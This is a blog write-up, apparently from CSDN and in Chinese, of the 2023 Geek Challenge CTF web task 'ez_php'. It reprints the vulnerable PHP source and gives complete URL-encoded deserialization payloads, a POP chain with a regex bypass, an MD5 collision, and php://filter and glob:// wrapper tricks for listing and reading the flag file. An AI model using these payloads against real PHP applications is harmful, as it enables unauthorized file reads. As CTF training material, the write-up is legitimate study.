2023极客大挑点WEB题:ez_php

已于 2023-12-07 20:51:17 修改
阅读量132 收藏
点赞数
文章标签: 前端 php android
于 2023-11-21 22:56:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shao65308/article/details/134542837
版权

preg_match("/^[Oa]:[\d]+/i";正则绕过,最开始用+号绕不过,

$a = new ArrayObject;

$a->a = new Me;

首先要读出key.php内容,

/key.php?a=PHP_SELF&user=C%3A8%3A%22SplStack%22%3A211%3A%7Bi%3A6%3B%3AO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3BN%3Bs%3A2%3A%22QW%22%3Bs%3A64%3A%22M%C9h%FF%0E%E3%5C+%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2%22%3Bs%3A3%3A%22YXX%22%3Bs%3A64%3A%22M%C9h%FF%0E%E3%5C+%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2%22%3B%7D%7D

key.php读出来要查看源文件才显示,是base64编码,在线转成图片,得到hername和key的值,后面第二步要用到

找POP链进入利用点: new $_POST['ctf']($_GET['fun']);

然后就是利用原生类进行找flag文件和读flag文件

<?php
header("Content-type:text/html;charset=utf-8"); 
error_reporting(0);
#show_source(__FILE__);
include('key.php');
include('waf.php');

class Me {
    public $qwe;
    public $bro;
    public $secret;

    public function __wakeup() {
        echo("进来啦<br>");
        $characters = 'abcdefghijklmnopqrstuvwxyz0123456789';
        $randomString = substr(str_shuffle($characters), 0, 6);
        $this->secret=$randomString;

        if($this->bro===$this->secret){
        $bb = $this->qwe;        
        return $bb();
        }
        
        else{
            echo("错了哥们,再试试吧<br>");
        }
    }

}

class her{
    private $hername='momo';
    private $key=9;
    public $asd;
    public function __invoke() {
        echo("好累,好想睡一觉啊<br>");
        serialize($this->asd);
    }

    public function find() {
        echo("你能找到加密用的key和她的名字吗?qwq<br>");
        if (encode($this->hername,$this->key) === 'vxvx') {
            echo("解密成功!<br>");
            $file=$_GET['file'];

            if (isset($file) && (file_get_contents($file,'r') === "loveyou"))
            {
                echo("快点的,急急急!!!<br>");
                echo new $_POST['ctf']($_GET['fun']);
            }
            else{
                echo("真的只差一步了!<br>");
            }
        }
        else{
            echo("兄弟怎么搞的?<br>");
        }
    }
}

class important{
    public $power;

/*     public function __sleep() {
        echo("睡饱了,接着找!<br>");
        return $this->power->seeyou;
    } */
}

class useless {
    private $seeyou;
    public $QW;
    public $YXX;

    public function __construct() {
        $this->QW=new her;
        $this->seeyou = array('seeyou'=>[$this->QW,'find']);
    }

/*     public function __destruct() {
        $characters = '0123456789';
        $random = substr(str_shuffle($characters), 0, 6);

        if (!preg_match('/key\.php\/*$/i', $_SERVER['REQUEST_URI'])){
            if((strlen($this->QW))<80 && strlen($this->YXX)<80){
                $bool=!is_array($this->QW)&&!is_array($this->YXX)&&(md5($this->QW) === md5($this->YXX)) && ($this->QW != $this->YXX) and $random==='newbee';
                if($bool){
                echo("快拿到我的小秘密了<br>");
                    $a = isset($_GET['a'])? $_GET['a']: "" ;

                    if(!preg_match('/HTTP/i', $a)){
                        echo (basename($_SERVER[$a]));
                        echo ('<br>');

                        if(basename($_SERVER[$a])==='key.php'){
                            echo("找到了!但好像不能直接使用,怎么办,我好想她<br>");
                            $file = "key.php";
                            readfile($file);
                        }
                    }
                    else{
                        echo("你别这样,她会生气的┭┮﹏┭┮");
                    }
                }
            }
            else{
                echo("就这点能耐?怎么帮我找到她(╥╯^╰╥)<br>");
            }
        }
    } */
    public function __get($good) {
        echo "you are good,你快找到我爱的那个她了<br>";
        $zhui = $this->$good;  
        $zhui[$good]();  
    }
}

if (isset($_GET['user'])) {
    $user = $_GET['user'];
    if (!preg_match("/^[Oa]:[\d]+/i", $user)) {
        unserialize($user);
    }
    else {
        echo("不是吧,第一层都绕不过去???<br>");
    }
}
else {
    echo("快帮我找找她!<br>");
}

$a = new ArrayObject;
$a->a = new Me;
$a->a->bro=&$a->a->secret;
$a->a->qwe=new her;
$a->a->qwe->asd=new important;
$a->a->qwe->asd->power=new useless;
$a->a->qwe->asd->power->QW=new her;
echo serialize($a);
echo '<br><br>';
echo urlencode(serialize($a));
?>

POST:ctf=DirectoryIterator:GET:fun=glob://f* 时可得到文件名flag文件名:flag_my_baby.php

GET:?user=C%3A11%3A%22ArrayObject%22%3A446%3A%7Bx%3Ai%3A0%3Ba%3A0%3A%7B%7D%3Bm%3Aa%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A2%3A%22Me%22%3A3%3A%7Bs%3A3%3A%22qwe%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BO%3A9%3A%22important%22%3A1%3A%7Bs%3A5%3A%22power%22%3BO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3Ba%3A1%3A%7Bs%3A6%3A%22seeyou%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BN%3B%7Di%3A1%3Bs%3A4%3A%22find%22%3B%7D%7Ds%3A2%3A%22QW%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BN%3B%7Ds%3A3%3A%22YXX%22%3BN%3B%7D%7D%7Ds%3A3%3A%22bro%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A23%3B%7D%7D%7D&file=data://text/plain,loveyou&fun=glob://f*

POST:ctf=DirectoryIterator

POST:ctf=SplFileObject;GET:fun=fun=php://filter/read=convert.base64-encode/resource=flag_my_baby.php

这里要用php伪协议读才能读全部文件内容,不然光用文件名只能读一行

/havefun.php?user=C%3A11%3A%22ArrayObject%22%3A446%3A%7Bx%3Ai%3A0%3Ba%3A0%3A%7B%7D%3Bm%3Aa%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A2%3A%22Me%22%3A3%3A%7Bs%3A3%3A%22qwe%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BO%3A9%3A%22important%22%3A1%3A%7Bs%3A5%3A%22power%22%3BO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3Ba%3A1%3A%7Bs%3A6%3A%22seeyou%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BN%3B%7Di%3A1%3Bs%3A4%3A%22find%22%3B%7D%7Ds%3A2%3A%22QW%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BN%3B%7Ds%3A3%3A%22YXX%22%3BN%3B%7D%7D%7Ds%3A3%3A%22bro%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A23%3B%7D%7D%7D&file=data://text/plain,loveyou&fun=php://filter/read=convert.base64-encode/resource=flag_my_baby.php

POST:ctf=SplFileObject

最终得到flag

最好发现直接访问flag_my_baby.php就可以出flag

shao65308
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
极客导航::red_heart:极客猿梦导航-独立开发者的导航站!
02-04
极客猿梦导航 独立开发者的导航站|| | 版本说明 :最初的一版静态页面,数据都写在页面里的。 :数据和页面共享,可以部署在github或gitee上使用,将dist目录下的文件上传到远程仓库里访问。 :vue2版本 :vue nuxt...
jikemiji::OK_hand:zhaoolee的博客《极客秘籍》
02-05
zhaoolee的博客仓库 为了让创作内容造福人类,我将博客内容放到这个开源仓库,希望能对看到这个仓库的你有所帮助! 本仓库永久地址: : 如何搜索 使用进行搜索。 资源集合 目录 - -开始 - - ...关注公众号「0加1」...
Geek challenge 2023 EzHttp
Welcome To Myon'Blog !
12-14 767
访问得到的路径:/o2takuXX's_username_and_password.txt。请求头X-Forwarded-For写127.0.0.1,要求使用Syc.vip代理。请求头Referer写sycsec.com,要求使用Syclover浏览器。请求头User-Agent写Syclover,要求从localhost访问。简单审一下,要求有请求头O2TAKUXX并且内容为GiveMeFlag。增加请求头O2TAKUXX,值为GiveMeFlag。请求头Via写Syc.vip,回显php代码。
PHP 正则表达式preg_match
彭世瑜的博客
02-05 1336
简化定义 preg_match (string $pattern , string $subject [array &$matches] ) : int 说明: $pattern 搜索模式 $subject 字符串 $matches 搜索结果(可选) 界定符:/ 示例 // 只校验结果 echo preg_match('/\d+/', '1234'); // 1 // 获取匹配结果...
CTFSHOW-命令执行
Monica的博客
09-03 4102
WEB29 目: <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 分析:目过滤了flag且忽略大小写 知识点:linux通配符 * 匹配任何字符串/文本,包括空字符串;*代表任意字符..
[极客挑战 2019]PHP&[ZJCTF 2019]NiZhuanSiWei
weixin_46133275的博客
07-23 274
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档。
ctfshow web入门(php反序列化)
qq_53263789的博客
07-19 520
ctfshow
网站::globe_with_meridians:我的个人网站为Nuxt.js应用程序,使用TypeScript编写并基于Material Design
02-18
:rolling_on_the_floor_laughing:极客的一些细节... :nerd_face: 我使用的一些技术:项目设置# Install dependencies...$ yarn install# Update dependencies...$ yarn upgrade项目启动与运行# Serve with hot ...
CodeINN:CodeINN是即时代码编辑器:page_with_curl:,它使编程和开发更加容易。 无需任何设置,即可直接从Web浏览器快速练习。 CodeINN为开发人员技术人员,编码员计算机和极客提供了理想的环境,使他们可以利用自己的技术做更多的事情
05-19
CodeINN为开发人员提供了完美的环境 :man::laptop: ,编码员 :laptop: 和极客 :nerd_face: 用他们的技术做更多的事情。 查看托管版本 特征 用于Web开发,编程和减价的单一平台,而无需不断切换工具 实时预览代码...
geektime-dl::alien_monster: Geektime-dl 是使用Go构建的快速、简单的极客时间下载器,支持专栏下载为PDF文档
05-25
视频现在已无法下载: 极客时间的视频是采用的阿里云视频私有加密方式,因个人能力有限,暂时无破解方法! 安装 必要条件 以下为必须安装依赖: FFmpeg Note: FFmpeg的使用是为了最后视频文件合并成需要的格式。 ...
CTF 总结02:preg_match()绕过
热门推荐
weixin_42789937的博客
01-18 1万+
preg_match()绕过,小白总结,修改过一次,后期会根据做经历有所增补~
preg_match函数的用法和匹配字符的的含义
qq_42318977的博客
04-07 1万+
利用 preg_match(),我们可以完成字符串的规则匹配。如果找到一个匹配,preg_match() 函数返回 1,否则返回 0。还有一个可选的第三参数可以让你把匹配的部分存在一个数组中。在验证数据时这个功能可以变得非常有用。 $string = "football"; if (preg_match('/foo/', $string)) { // 匹配正确 } 上面的例子将成功匹配,因为单词 football 里面包含 foo。现在我们来试一个更复杂的,例如验证一个 Email 地址。 $string
[极客挑战 2019]PHP1-原创超详细
qq_58166735的博客
12-09 3210
php反序列化根据__destruct 析构函数(在这个对象的内容执行完之前 执行函数的内容)的内容可以得知,password=100,username=admin的时候满足条件就可以获得flag。扫出来www.zip这个文件,然后下载下来 ,里面只有index.php和class.php两个文件有作用。(img-WxhXrNIn-1670552259273)]但是发现这个里面有空格,所以把空格url编码变成%00再传参。我用的是top7777.txt字典,扫的很慢。获得flag,实验结束。
[极客挑战 2019]PHP1
陈艺秋的博客
05-27 2483
既然提到了备份网站估计也是存在着网站备份文件,可以先用御剑扫一下啥都没扫出来,但是上回做文件备份的目时收集了一些关于常用备份文件的文件名和后缀,可以直接使用burp抓包爆破,果然爆破出一个www.zip文件访问下载好文件就有三个php文件,下面进行代码审计。
[极客挑战 2019]PHP(反序列化)
mafucan的博客
07-17 949
输出结果中Name和username,Name和password之间是有不可见字符的,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。输出结果中Name和username,Name和password之间是有不可见字符的,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。这表示序列化的对象类型,其中 4 表示类名 “Name” 的长度,“Name” 是类名本身,2 表示该对象有两个属性。
[极客挑战 2019]PHP-反序列化
siu~
11-14 176
[极客挑战 2019]PHP-反序列化
[极客挑战 2019]PHP
fcz___的博客
03-05 186
然后看了一下才知道用序列化加%00\n在序列化时,Public属性序列化后格式:成员名,Private属性序列化后格式:%00类名%00成员名,Protected属性序列化后的格式:%00*%00成员名。\n但是在对序列化后的数据直接进行复制时会丢失 %00 所以我们对其手动补全,并更改成员属性数目使其大于实际数目那我们就加%00。就是这样:O:4:“Name”:2:{s:14:“Nameusername”;既然他提示我们备份文件,那我们就dirsearch扫描一下目录。我们的右键是不能用的。
BUUCTF--极客挑战php
最新发布
woshicainiao666的博客
03-06 1193
www.zip。
极客挑战 2019】 PHP
Lixunzhe0112的博客
01-17 177
在上面的class中有一个 __wakeup() 方法,调用反序列化函数的时候会先调用了 __wakeup() 方法,但是这个方法有个缺陷,就是当参数的个数大于实际参数个数的时候就可以跳过执行 __wakeup() 方法。在类外部使用 serialize() 函数进行序列化的时候,会先调用类内部的 __sleep() 方法,同理在调用 unserialize() 函数的时候会先调用 __wakeup() 方法。//注意方框代表空格,直接在浏览器中复制的序列化没有空格。下面给出解释,这里并不是空格。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值